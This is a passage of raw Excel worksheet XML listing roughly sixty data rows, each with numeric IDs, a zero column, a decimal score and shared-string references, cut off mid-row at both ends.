      <c r="B1001">
        <v>2665</v>
      </c>
      <c r="C1001">
        <v>2665</v>
      </c>
      <c r="D1001">
        <v>0</v>
      </c>
      <c r="E1001">
        <v>0.79269999265670776</v>
      </c>
      <c r="F1001" t="s">
        <v>7</v>
      </c>
      <c r="G1001" t="s">
        <v>1974</v>
      </c>
      <c r="H1001" t="s">
        <v>1975</v>
      </c>
    </row>
    <row r="1002" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1002" s="1">
        <v>1000</v>
      </c>
      <c r="B1002">
        <v>6757</v>
      </c>
      <c r="C1002">
        <v>6757</v>
      </c>
      <c r="D1002">
        <v>0</v>
      </c>
      <c r="E1002">
        <v>0.49779999256134028</v>
      </c>
      <c r="F1002" t="s">
        <v>7</v>
      </c>
      <c r="G1002" t="s">
        <v>1976</v>
      </c>
      <c r="H1002" t="s">
        <v>1977</v>
      </c>
    </row>
    <row r="1003" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1003" s="1">
        <v>1001</v>
      </c>
      <c r="B1003">
        <v>2639</v>
      </c>
      <c r="C1003">
        <v>2639</v>
      </c>
      <c r="D1003">
        <v>0</v>
      </c>
      <c r="E1003">
        <v>0.52689999341964722</v>
      </c>
      <c r="F1003" t="s">
        <v>7</v>
      </c>
      <c r="G1003" t="s">
        <v>1978</v>
      </c>
      <c r="H1003" t="s">
        <v>1979</v>
      </c>
    </row>
    <row r="1004" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1004" s="1">
        <v>1002</v>
      </c>
      <c r="B1004">
        <v>6751</v>
      </c>
      <c r="C1004">
        <v>6751</v>
      </c>
      <c r="D1004">
        <v>0</v>
      </c>
      <c r="E1004">
        <v>0.51749998331069946</v>
      </c>
      <c r="F1004" t="s">
        <v>7</v>
      </c>
      <c r="G1004" t="s">
        <v>1980</v>
      </c>
      <c r="H1004" t="s">
        <v>1981</v>
      </c>
    </row>
    <row r="1005" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1005" s="1">
        <v>1003</v>
      </c>
      <c r="B1005">
        <v>6166</v>
      </c>
      <c r="C1005">
        <v>6166</v>
      </c>
      <c r="D1005">
        <v>0</v>
      </c>
      <c r="E1005">
        <v>0.85290002822875977</v>
      </c>
      <c r="F1005" t="s">
        <v>7</v>
      </c>
      <c r="G1005" t="s">
        <v>1982</v>
      </c>
      <c r="H1005" t="s">
        <v>1983</v>
      </c>
    </row>
    <row r="1006" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1006" s="1">
        <v>1004</v>
      </c>
      <c r="B1006">
        <v>4179</v>
      </c>
      <c r="C1006">
        <v>4179</v>
      </c>
      <c r="D1006">
        <v>0</v>
      </c>
      <c r="E1006">
        <v>0.9944000244140625</v>
      </c>
      <c r="F1006" t="s">
        <v>7</v>
      </c>
      <c r="G1006" t="s">
        <v>1984</v>
      </c>
      <c r="H1006" t="s">
        <v>1985</v>
      </c>
    </row>
    <row r="1007" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1007" s="1">
        <v>1005</v>
      </c>
      <c r="B1007">
        <v>4178</v>
      </c>
      <c r="C1007">
        <v>4178</v>
      </c>
      <c r="D1007">
        <v>0</v>
      </c>
      <c r="E1007">
        <v>0.99830001592636108</v>
      </c>
      <c r="F1007" t="s">
        <v>7</v>
      </c>
      <c r="G1007" t="s">
        <v>1986</v>
      </c>
      <c r="H1007" t="s">
        <v>1987</v>
      </c>
    </row>
    <row r="1008" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1008" s="1">
        <v>1006</v>
      </c>
      <c r="B1008">
        <v>2652</v>
      </c>
      <c r="C1008">
        <v>2652</v>
      </c>
      <c r="D1008">
        <v>0</v>
      </c>
      <c r="E1008">
        <v>0.87660002708435059</v>
      </c>
      <c r="F1008" t="s">
        <v>7</v>
      </c>
      <c r="G1008" t="s">
        <v>1988</v>
      </c>
      <c r="H1008" t="s">
        <v>1989</v>
      </c>
    </row>
    <row r="1009" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1009" s="1">
        <v>1007</v>
      </c>
      <c r="B1009">
        <v>2654</v>
      </c>
      <c r="C1009">
        <v>2654</v>
      </c>
      <c r="D1009">
        <v>0</v>
      </c>
      <c r="E1009">
        <v>0.75349998474121094</v>
      </c>
      <c r="F1009" t="s">
        <v>7</v>
      </c>
      <c r="G1009" t="s">
        <v>1990</v>
      </c>
      <c r="H1009" t="s">
        <v>1991</v>
      </c>
    </row>
    <row r="1010" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1010" s="1">
        <v>1008</v>
      </c>
      <c r="B1010">
        <v>4181</v>
      </c>
      <c r="C1010">
        <v>4181</v>
      </c>
      <c r="D1010">
        <v>0</v>
      </c>
      <c r="E1010">
        <v>0.54790002107620239</v>
      </c>
      <c r="F1010" t="s">
        <v>7</v>
      </c>
      <c r="G1010" t="s">
        <v>1992</v>
      </c>
      <c r="H1010" t="s">
        <v>1993</v>
      </c>
    </row>
    <row r="1011" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1011" s="1">
        <v>1009</v>
      </c>
      <c r="B1011">
        <v>2715</v>
      </c>
      <c r="C1011">
        <v>2715</v>
      </c>
      <c r="D1011">
        <v>0</v>
      </c>
      <c r="E1011">
        <v>0.48379999399185181</v>
      </c>
      <c r="F1011" t="s">
        <v>7</v>
      </c>
      <c r="G1011" t="s">
        <v>1994</v>
      </c>
      <c r="H1011" t="s">
        <v>1995</v>
      </c>
    </row>
    <row r="1012" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1012" s="1">
        <v>1010</v>
      </c>
      <c r="B1012">
        <v>2716</v>
      </c>
      <c r="C1012">
        <v>2716</v>
      </c>
      <c r="D1012">
        <v>0</v>
      </c>
      <c r="E1012">
        <v>0.84259998798370361</v>
      </c>
      <c r="F1012" t="s">
        <v>7</v>
      </c>
      <c r="G1012" t="s">
        <v>1996</v>
      </c>
      <c r="H1012" t="s">
        <v>1997</v>
      </c>
    </row>
    <row r="1013" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1013" s="1">
        <v>1011</v>
      </c>
      <c r="B1013">
        <v>6713</v>
      </c>
      <c r="C1013">
        <v>6713</v>
      </c>
      <c r="D1013">
        <v>0</v>
      </c>
      <c r="E1013">
        <v>0.57419997453689575</v>
      </c>
      <c r="F1013" t="s">
        <v>7</v>
      </c>
      <c r="G1013" t="s">
        <v>1998</v>
      </c>
      <c r="H1013" t="s">
        <v>1999</v>
      </c>
    </row>
    <row r="1014" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1014" s="1">
        <v>1012</v>
      </c>
      <c r="B1014">
        <v>6201</v>
      </c>
      <c r="C1014">
        <v>6201</v>
      </c>
      <c r="D1014">
        <v>0</v>
      </c>
      <c r="E1014">
        <v>0.58499997854232788</v>
      </c>
      <c r="F1014" t="s">
        <v>7</v>
      </c>
      <c r="G1014" t="s">
        <v>2000</v>
      </c>
      <c r="H1014" t="s">
        <v>2001</v>
      </c>
    </row>
    <row r="1015" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1015" s="1">
        <v>1013</v>
      </c>
      <c r="B1015">
        <v>2762</v>
      </c>
      <c r="C1015">
        <v>2762</v>
      </c>
      <c r="D1015">
        <v>0</v>
      </c>
      <c r="E1015">
        <v>0.29429998993873602</v>
      </c>
      <c r="F1015" t="s">
        <v>7</v>
      </c>
      <c r="G1015" t="s">
        <v>2002</v>
      </c>
      <c r="H1015" t="s">
        <v>2003</v>
      </c>
    </row>
    <row r="1016" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1016" s="1">
        <v>1014</v>
      </c>
      <c r="B1016">
        <v>2763</v>
      </c>
      <c r="C1016">
        <v>2763</v>
      </c>
      <c r="D1016">
        <v>0</v>
      </c>
      <c r="E1016">
        <v>0.79869997501373291</v>
      </c>
      <c r="F1016" t="s">
        <v>7</v>
      </c>
      <c r="G1016" t="s">
        <v>2004</v>
      </c>
      <c r="H1016" t="s">
        <v>2005</v>
      </c>
    </row>
    <row r="1017" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1017" s="1">
        <v>1015</v>
      </c>
      <c r="B1017">
        <v>2764</v>
      </c>
      <c r="C1017">
        <v>2764</v>
      </c>
      <c r="D1017">
        <v>0</v>
      </c>
      <c r="E1017">
        <v>0.85879999399185181</v>
      </c>
      <c r="F1017" t="s">
        <v>7</v>
      </c>
      <c r="G1017" t="s">
        <v>2006</v>
      </c>
      <c r="H1017" t="s">
        <v>2007</v>
      </c>
    </row>
    <row r="1018" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1018" s="1">
        <v>1016</v>
      </c>
      <c r="B1018">
        <v>2765</v>
      </c>
      <c r="C1018">
        <v>2765</v>
      </c>
      <c r="D1018">
        <v>0</v>
      </c>
      <c r="E1018">
        <v>0.50429999828338623</v>
      </c>
      <c r="F1018" t="s">
        <v>7</v>
      </c>
      <c r="G1018" t="s">
        <v>2008</v>
      </c>
      <c r="H1018" t="s">
        <v>2009</v>
      </c>
    </row>
    <row r="1019" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1019" s="1">
        <v>1017</v>
      </c>
      <c r="B1019">
        <v>6697</v>
      </c>
      <c r="C1019">
        <v>6697</v>
      </c>
      <c r="D1019">
        <v>0</v>
      </c>
      <c r="E1019">
        <v>0.93239998817443848</v>
      </c>
      <c r="F1019" t="s">
        <v>7</v>
      </c>
      <c r="G1019" t="s">
        <v>2010</v>
      </c>
      <c r="H1019" t="s">
        <v>2011</v>
      </c>
    </row>
    <row r="1020" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1020" s="1">
        <v>1018</v>
      </c>
      <c r="B1020">
        <v>6203</v>
      </c>
      <c r="C1020">
        <v>6203</v>
      </c>
      <c r="D1020">
        <v>0</v>
      </c>
      <c r="E1020">
        <v>0.57719999551773071</v>
      </c>
      <c r="F1020" t="s">
        <v>7</v>
      </c>
      <c r="G1020" t="s">
        <v>2012</v>
      </c>
      <c r="H1020" t="s">
        <v>2013</v>
      </c>
    </row>
    <row r="1021" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1021" s="1">
        <v>1019</v>
      </c>
      <c r="B1021">
        <v>2760</v>
      </c>
      <c r="C1021">
        <v>2760</v>
      </c>
      <c r="D1021">
        <v>0</v>
      </c>
      <c r="E1021">
        <v>0.75609999895095825</v>
      </c>
      <c r="F1021" t="s">
        <v>7</v>
      </c>
      <c r="G1021" t="s">
        <v>2014</v>
      </c>
      <c r="H1021" t="s">
        <v>2015</v>
      </c>
    </row>
    <row r="1022" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1022" s="1">
        <v>1020</v>
      </c>
      <c r="B1022">
        <v>4085</v>
      </c>
      <c r="C1022">
        <v>4085</v>
      </c>
      <c r="D1022">
        <v>0</v>
      </c>
      <c r="E1022">
        <v>0.96299999952316284</v>
      </c>
      <c r="F1022" t="s">
        <v>7</v>
      </c>
      <c r="G1022" t="s">
        <v>2016</v>
      </c>
      <c r="H1022" t="s">
        <v>2017</v>
      </c>
    </row>
    <row r="1023" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1023" s="1">
        <v>1021</v>
      </c>
      <c r="B1023">
        <v>6204</v>
      </c>
      <c r="C1023">
        <v>6204</v>
      </c>
      <c r="D1023">
        <v>0</v>
      </c>
      <c r="E1023">
        <v>0.74080002307891846</v>
      </c>
      <c r="F1023" t="s">
        <v>7</v>
      </c>
      <c r="G1023" t="s">
        <v>2018</v>
      </c>
      <c r="H1023" t="s">
        <v>2019</v>
      </c>
    </row>
    <row r="1024" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1024" s="1">
        <v>1022</v>
      </c>
      <c r="B1024">
        <v>4082</v>
      </c>
      <c r="C1024">
        <v>4082</v>
      </c>
      <c r="D1024">
        <v>0</v>
      </c>
      <c r="E1024">
        <v>0.43569999933242798</v>
      </c>
      <c r="F1024" t="s">
        <v>7</v>
      </c>
      <c r="G1024" t="s">
        <v>2020</v>
      </c>
      <c r="H1024" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="1025" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1025" s="1">
        <v>1023</v>
      </c>
      <c r="B1025">
        <v>6205</v>
      </c>
      <c r="C1025">
        <v>6205</v>
      </c>
      <c r="D1025">
        <v>0</v>
      </c>
      <c r="E1025">
        <v>0.99750000238418579</v>
      </c>
      <c r="F1025" t="s">
        <v>7</v>
      </c>
      <c r="G1025" t="s">
        <v>2022</v>
      </c>
      <c r="H1025" t="s">
        <v>2023</v>
      </c>
    </row>
    <row r="1026" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1026" s="1">
        <v>1024</v>
      </c>
      <c r="B1026">
        <v>6207</v>
      </c>
      <c r="C1026">
        <v>6207</v>
      </c>
      <c r="D1026">
        <v>0</v>
      </c>
      <c r="E1026">
        <v>0.50950002670288086</v>
      </c>
      <c r="F1026" t="s">
        <v>7</v>
      </c>
      <c r="G1026" t="s">
        <v>2024</v>
      </c>
      <c r="H1026" t="s">
        <v>2025</v>
      </c>
    </row>
    <row r="1027" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1027" s="1">
        <v>1025</v>
      </c>
      <c r="B1027">
        <v>6209</v>
      </c>
      <c r="C1027">
        <v>6209</v>
      </c>
      <c r="D1027">
        <v>0</v>
      </c>
      <c r="E1027">
        <v>0.81730002164840698</v>
      </c>
      <c r="F1027" t="s">
        <v>7</v>
      </c>
      <c r="G1027" t="s">
        <v>2026</v>
      </c>
      <c r="H1027" t="s">
        <v>2027</v>
      </c>
    </row>
    <row r="1028" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1028" s="1">
        <v>1026</v>
      </c>
      <c r="B1028">
        <v>4072</v>
      </c>
      <c r="C1028">
        <v>4072</v>
      </c>
      <c r="D1028">
        <v>0</v>
      </c>
      <c r="E1028">
        <v>0.67360001802444458</v>
      </c>
      <c r="F1028" t="s">
        <v>7</v>
      </c>
      <c r="G1028" t="s">
        <v>2028</v>
      </c>
      <c r="H1028" t="s">
        <v>2029</v>
      </c>
    </row>
    <row r="1029" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1029" s="1">
        <v>1027</v>
      </c>
      <c r="B1029">
        <v>5574</v>
      </c>
      <c r="C1029">
        <v>5574</v>
      </c>
      <c r="D1029">
        <v>0</v>
      </c>
      <c r="E1029">
        <v>0.98580002784729004</v>
      </c>
      <c r="F1029" t="s">
        <v>7</v>
      </c>
      <c r="G1029" t="s">
        <v>2030</v>
      </c>
      <c r="H1029" t="s">
        <v>2031</v>
      </c>
    </row>
    <row r="1030" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1030" s="1">
        <v>1028</v>
      </c>
      <c r="B1030">
        <v>2771</v>
      </c>
      <c r="C1030">
        <v>2771</v>
      </c>
      <c r="D1030">
        <v>0</v>
      </c>
      <c r="E1030">
        <v>0.63380002975463867</v>
      </c>
      <c r="F1030" t="s">
        <v>7</v>
      </c>
      <c r="G1030" t="s">
        <v>2032</v>
      </c>
      <c r="H1030" t="s">
        <v>2033</v>
      </c>
    </row>
    <row r="1031" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1031" s="1">
        <v>1029</v>
      </c>
      <c r="B1031">
        <v>2759</v>
      </c>
      <c r="C1031">
        <v>2759</v>
      </c>
      <c r="D1031">
        <v>0</v>
      </c>
      <c r="E1031">
        <v>0.98960000276565552</v>
      </c>
      <c r="F1031" t="s">
        <v>7</v>
      </c>
      <c r="G1031" t="s">
        <v>2034</v>
      </c>
      <c r="H1031" t="s">
        <v>2035</v>
      </c>
    </row>
    <row r="1032" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1032" s="1">
        <v>1030</v>
      </c>
      <c r="B1032">
        <v>4090</v>
      </c>
      <c r="C1032">
        <v>4090</v>
      </c>
      <c r="D1032">
        <v>0</v>
      </c>
      <c r="E1032">
        <v>0.9869999885559082</v>
      </c>
      <c r="F1032" t="s">
        <v>7</v>
      </c>
      <c r="G1032" t="s">
        <v>2036</v>
      </c>
      <c r="H1032" t="s">
        <v>2037</v>
      </c>
    </row>
    <row r="1033" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1033" s="1">
        <v>1031</v>
      </c>
      <c r="B1033">
        <v>2757</v>
      </c>
      <c r="C1033">
        <v>2757</v>
      </c>
      <c r="D1033">
        <v>0</v>
      </c>
      <c r="E1033">
        <v>0.71719998121261597</v>
      </c>
      <c r="F1033" t="s">
        <v>7</v>
      </c>
      <c r="G1033" t="s">
        <v>2038</v>
      </c>
      <c r="H1033" t="s">
        <v>2039</v>
      </c>
    </row>
    <row r="1034" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1034" s="1">
        <v>1032</v>
      </c>
      <c r="B1034">
        <v>6712</v>
      </c>
      <c r="C1034">
        <v>6712</v>
      </c>
      <c r="D1034">
        <v>0</v>
      </c>
      <c r="E1034">
        <v>0.95490002632141113</v>
      </c>
      <c r="F1034" t="s">
        <v>7</v>
      </c>
      <c r="G1034" t="s">
        <v>2040</v>
      </c>
      <c r="H1034" t="s">
        <v>2041</v>
      </c>
    </row>
    <row r="1035" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1035" s="1">
        <v>1033</v>
      </c>
      <c r="B1035">
        <v>6711</v>
      </c>
      <c r="C1035">
        <v>6711</v>
      </c>
      <c r="D1035">
        <v>0</v>
      </c>
      <c r="E1035">
        <v>0.62099999189376831</v>
      </c>
      <c r="F1035" t="s">
        <v>7</v>
      </c>
      <c r="G1035" t="s">
        <v>2042</v>
      </c>
      <c r="H1035" t="s">
        <v>2043</v>
      </c>
    </row>
    <row r="1036" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1036" s="1">
        <v>1034</v>
      </c>
      <c r="B1036">
        <v>2722</v>
      </c>
      <c r="C1036">
        <v>2722</v>
      </c>
      <c r="D1036">
        <v>0</v>
      </c>
      <c r="E1036">
        <v>0.81739997863769531</v>
      </c>
      <c r="F1036" t="s">
        <v>7</v>
      </c>
      <c r="G1036" t="s">
        <v>2044</v>
      </c>
      <c r="H1036" t="s">
        <v>2045</v>
      </c>
    </row>
    <row r="1037" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1037" s="1">
        <v>1035</v>
      </c>
      <c r="B1037">
        <v>4109</v>
      </c>
      <c r="C1037">
        <v>4109</v>
      </c>
      <c r="D1037">
        <v>0</v>
      </c>
      <c r="E1037">
        <v>0.85360002517700195</v>
      </c>
      <c r="F1037" t="s">
        <v>7</v>
      </c>
      <c r="G1037" t="s">
        <v>2046</v>
      </c>
      <c r="H1037" t="s">
        <v>2047</v>
      </c>
    </row>
    <row r="1038" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1038" s="1">
        <v>1036</v>
      </c>
      <c r="B1038">
        <v>2726</v>
      </c>
      <c r="C1038">
        <v>2726</v>
      </c>
      <c r="D1038">
        <v>0</v>
      </c>
      <c r="E1038">
        <v>0.93980002403259277</v>
      </c>
      <c r="F1038" t="s">
        <v>7</v>
      </c>
      <c r="G1038" t="s">
        <v>2048</v>
      </c>
      <c r="H1038" t="s">
        <v>2049</v>
      </c>
    </row>
    <row r="1039" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1039" s="1">
        <v>1037</v>
      </c>
      <c r="B1039">
        <v>4105</v>
      </c>
      <c r="C1039">
        <v>4105</v>
      </c>
      <c r="D1039">
        <v>0</v>
      </c>
      <c r="E1039">
        <v>0.56529998779296875</v>
      </c>
      <c r="F1039" t="s">
        <v>7</v>
      </c>
      <c r="G1039" t="s">
        <v>2050</v>
      </c>
      <c r="H1039" t="s">
        <v>2051</v>
      </c>
    </row>
    <row r="1040" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1040" s="1">
        <v>1038</v>
      </c>
      <c r="B1040">
        <v>6196</v>
      </c>
      <c r="C1040">
        <v>6196</v>
      </c>
      <c r="D1040">
        <v>0</v>
      </c>
      <c r="E1040">
        <v>0.79509997367858887</v>
      </c>
      <c r="F1040" t="s">
        <v>7</v>
      </c>
      <c r="G1040" t="s">
        <v>2052</v>
      </c>
      <c r="H1040" t="s">
        <v>2053</v>
      </c>
    </row>
    <row r="1041" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1041" s="1">
        <v>1039</v>
      </c>
      <c r="B1041">
        <v>2737</v>
      </c>
      <c r="C1041">
        <v>2737</v>
      </c>
      <c r="D1041">
        <v>0</v>
      </c>
      <c r="E1041">
        <v>0.99629998207092285</v>
      </c>
      <c r="F1041" t="s">
        <v>7</v>
      </c>
      <c r="G1041" t="s">
        <v>2054</v>
      </c>
      <c r="H1041" t="s">
        <v>2055</v>
      </c>
    </row>
    <row r="1042" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1042" s="1">
        <v>1040</v>
      </c>
      <c r="B1042">
        <v>4099</v>
      </c>
      <c r="C1042">
        <v>4099</v>
      </c>
      <c r="D1042">
        <v>0</v>
      </c>
      <c r="E1042">
        <v>0.95279997587203979</v>
      </c>
      <c r="F1042" t="s">
        <v>7</v>
      </c>
      <c r="G1042" t="s">
        <v>2056</v>
      </c>
      <c r="H1042" t="s">
        <v>2057</v>
      </c>
    </row>
    <row r="1043" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1043" s="1">
        <v>1041</v>
      </c>
      <c r="B1043">
        <v>4098</v>
      </c>
      <c r="C1043">
        <v>4098</v>
      </c>
      <c r="D1043">
        <v>0</v>
      </c>
      <c r="E1043">
        <v>0.5853000283241272</v>
      </c>
      <c r="F1043" t="s">
        <v>7</v>
      </c>
      <c r="G1043" t="s">
        <v>2058</v>
      </c>
      <c r="H1043" t="s">
        <v>2059</v>
      </c>
    </row>
    <row r="1044" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1044" s="1">
        <v>1042</v>
      </c>
      <c r="B1044">
        <v>2745</v>
      </c>
      <c r="C1044">
        <v>2745</v>
      </c>
      <c r="D1044">
        <v>0</v>
      </c>
      <c r="E1044">
        <v>0.8880000114440918</v>
      </c>
      <c r="F1044" t="s">
        <v>7</v>
      </c>
      <c r="G1044" t="s">
        <v>2060</v>
      </c>
      <c r="H1044" t="s">
        <v>2061</v>
      </c>
    </row>
    <row r="1045" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1045" s="1">
        <v>1043</v>
      </c>
      <c r="B1045">
        <v>4095</v>
      </c>
      <c r="C1045">
        <v>4095</v>
      </c>
      <c r="D1045">
        <v>0</v>
      </c>
      <c r="E1045">
        <v>0.52569997310638428</v>
      </c>
      <c r="F1045" t="s">
        <v>7</v>
      </c>
      <c r="G1045" t="s">
        <v>2062</v>
      </c>
      <c r="H1045" t="s">
        <v>2063</v>
      </c>
    </row>
    <row r="1046" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1046" s="1">
        <v>1044</v>
      </c>
      <c r="B1046">
        <v>6702</v>
      </c>
      <c r="C1046">
        <v>6702</v>
      </c>
      <c r="D1046">
        <v>0</v>
      </c>
      <c r="E1046">
        <v>0.52740001678466797</v>
      </c>
      <c r="F1046" t="s">
        <v>7</v>
      </c>
      <c r="G1046" t="s">
        <v>2064</v>
      </c>
      <c r="H1046" t="s">
        <v>2065</v>
      </c>
    </row>
    <row r="1047" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1047" s="1">
        <v>1045</v>
      </c>
      <c r="B1047">
        <v>2749</v>
      </c>
      <c r="C1047">
        <v>2749</v>
      </c>
      <c r="D1047">
        <v>0</v>
      </c>
      <c r="E1047">
        <v>0.90640002489089966</v>
      </c>
      <c r="F1047" t="s">
        <v>7</v>
      </c>
      <c r="G1047" t="s">
        <v>2066</v>
      </c>
      <c r="H1047" t="s">
        <v>2067</v>
      </c>
    </row>
    <row r="1048" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1048" s="1">
        <v>1046</v>
      </c>
      <c r="B1048">
        <v>6701</v>
      </c>
      <c r="C1048">
        <v>6701</v>
      </c>
      <c r="D1048">
        <v>0</v>
      </c>
      <c r="E1048">
        <v>0.5900999903678894</v>
      </c>
      <c r="F1048" t="s">
        <v>7</v>
      </c>
      <c r="G1048" t="s">
        <v>2068</v>
      </c>
      <c r="H1048" t="s">
        <v>2069</v>
      </c>
    </row>
    <row r="1049" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1049" s="1">
        <v>1047</v>
      </c>
      <c r="B1049">
        <v>6700</v>
      </c>
      <c r="C1049">
        <v>6700</v>
      </c>
      <c r="D1049">
        <v>0</v>
      </c>
      <c r="E1049">
        <v>0.79659998416900635</v>
      </c>
      <c r="F1049" t="s">
        <v>7</v>
      </c>
      <c r="G1049" t="s">
        <v>2070</v>
      </c>
      <c r="H1049" t="s">
        <v>2071</v>
      </c>
    </row>
    <row r="1050" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1050" s="1">
        <v>1048</v>
      </c>
      <c r="B1050">
        <v>4092</v>
      </c>
      <c r="C1050">
        <v>4092</v>
      </c>
      <c r="D1050">
        <v>0</v>
      </c>
      <c r="E1050">
        <v>0.55379998683929443</v>
      </c>
      <c r="F1050" t="s">
        <v>7</v>
      </c>
      <c r="G1050" t="s">
        <v>2072</v>
      </c>
      <c r="H1050" t="s">
        <v>2073</v>
      </c>
    </row>
    <row r="1051" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1051" s="1">
        <v>1049</v>
      </c>
      <c r="B1051">
        <v>2616</v>
      </c>
      <c r="C1051">
        <v>2616</v>
      </c>
      <c r="D1051">
        <v>0</v>
      </c>
      <c r="E1051">
        <v>0.580299973487854</v>
      </c>
      <c r="F1051" t="s">
        <v>7</v>
      </c>
      <c r="G1051" t="s">
        <v>2074</v>
      </c>
      <c r="H1051" t="s">
        <v>2075</v>
      </c>
    </row>
    <row r="1052" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1052" s="1">
        <v>1050</v>
      </c>
      <c r="B1052">
        <v>2790</v>
      </c>
      <c r="C1052">
        <v>2790</v>
      </c>
      <c r="D1052">
        <v>0</v>
      </c>
      <c r="E1052">
        <v>0.46860000491142267</v>
      </c>
      <c r="F1052" t="s">
        <v>7</v>
      </c>
      <c r="G1052" t="s">
        <v>2076</v>
      </c>
      <c r="H1052" t="s">
        <v>2077</v>
      </c>
    </row>
    <row r="1053" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1053" s="1">
        <v>1051</v>
      </c>
      <c r="B1053">
        <v>2614</v>
      </c>
      <c r="C1053">
        <v>2614</v>
      </c>
      <c r="D1053">
        <v>0</v>
      </c>
      <c r="E1053">
        <v>0.65590000152587891</v>
      </c>
      <c r="F1053" t="s">
        <v>7</v>
      </c>
      <c r="G1053" t="s">
        <v>2078</v>
      </c>
      <c r="H1053" t="s">
        <v>2079</v>
      </c>
    </row>
    <row r="1054" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1054" s="1">
        <v>1052</v>
      </c>
      <c r="B1054">
        <v>2611</v>
      </c>
      <c r="C1054">
        <v>2611</v>
      </c>
      <c r="D1054">
        <v>0</v>
      </c>
      <c r="E1054">
        <v>0.99790000915527344</v>
      </c>
      <c r="F1054" t="s">
        <v>7</v>
      </c>
      <c r="G1054" t="s">
        <v>2080</v>
      </c>
      <c r="H1054" t="s">
        <v>2081</v>
      </c>
    </row>
    <row r="1055" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1055" s="1">
        <v>1053</v>
      </c>
      <c r="B1055">
        <v>2474</v>
      </c>
      <c r="C1055">
        <v>2474</v>
      </c>
      <c r="D1055">
        <v>0</v>
      </c>
      <c r="E1055">
        <v>0.67659997940063477</v>
      </c>
      <c r="F1055" t="s">
        <v>7</v>
      </c>
      <c r="G1055" t="s">
        <v>2082</v>
      </c>
      <c r="H1055" t="s">
        <v>2083</v>
      </c>
    </row>
    <row r="1056" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1056" s="1">
        <v>1054</v>
      </c>
      <c r="B1056">
        <v>2476</v>
      </c>
      <c r="C1056">
        <v>2476</v>
      </c>
      <c r="D1056">
        <v>0</v>
      </c>
      <c r="E1056">
        <v>0.88849997520446777</v>
      </c>
      <c r="F1056" t="s">
        <v>7</v>
      </c>
      <c r="G1056" t="s">
        <v>2084</v>
      </c>
      <c r="H1056" t="s">
        <v>2085</v>
      </c>
    </row>
    <row r="1057" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1057" s="1">
        <v>1055</v>
      </c>
      <c r="B1057">
        <v>2479</v>
      </c>
      <c r="C1057">
        <v>2479</v>
      </c>
      <c r="D1057">
        <v>0</v>
      </c>
      <c r="E1057">
        <v>0.44789999723434448</v>
      </c>
      <c r="F1057" t="s">
        <v>7</v>
      </c>
      <c r="G1057" t="s">
        <v>2086</v>
      </c>
      <c r="H1057" t="s">
        <v>2087</v>
      </c>
    </row>
    <row r="1058" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1058" s="1">
        <v>1056</v>
      </c>
      <c r="B1058">
        <v>6126</v>
      </c>
      <c r="C1058">
        <v>6126</v>
      </c>
      <c r="D1058">
        <v>0</v>
      </c>
      <c r="E1058">
        <v>0.56540000438690186</v>
      </c>
      <c r="F1058" t="s">
        <v>7</v>
      </c>
      <c r="G1058" t="s">
        <v>2088</v>
      </c>
      <c r="H1058" t="s">
        <v>2089</v>
      </c>
    </row>
    <row r="1059" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1059" s="1">
        <v>1057</v>
      </c>
      <c r="B1059">
        <v>6815</v>
      </c>
      <c r="C1059">
        <v>6815</v>
      </c>
      <c r="D1059">
        <v>0</v>
      </c>
      <c r="E1059">
        <v>0.59069997072219849</v>
      </c>
      <c r="F1059" t="s">
        <v>7</v>
      </c>
      <c r="G1059" t="s">
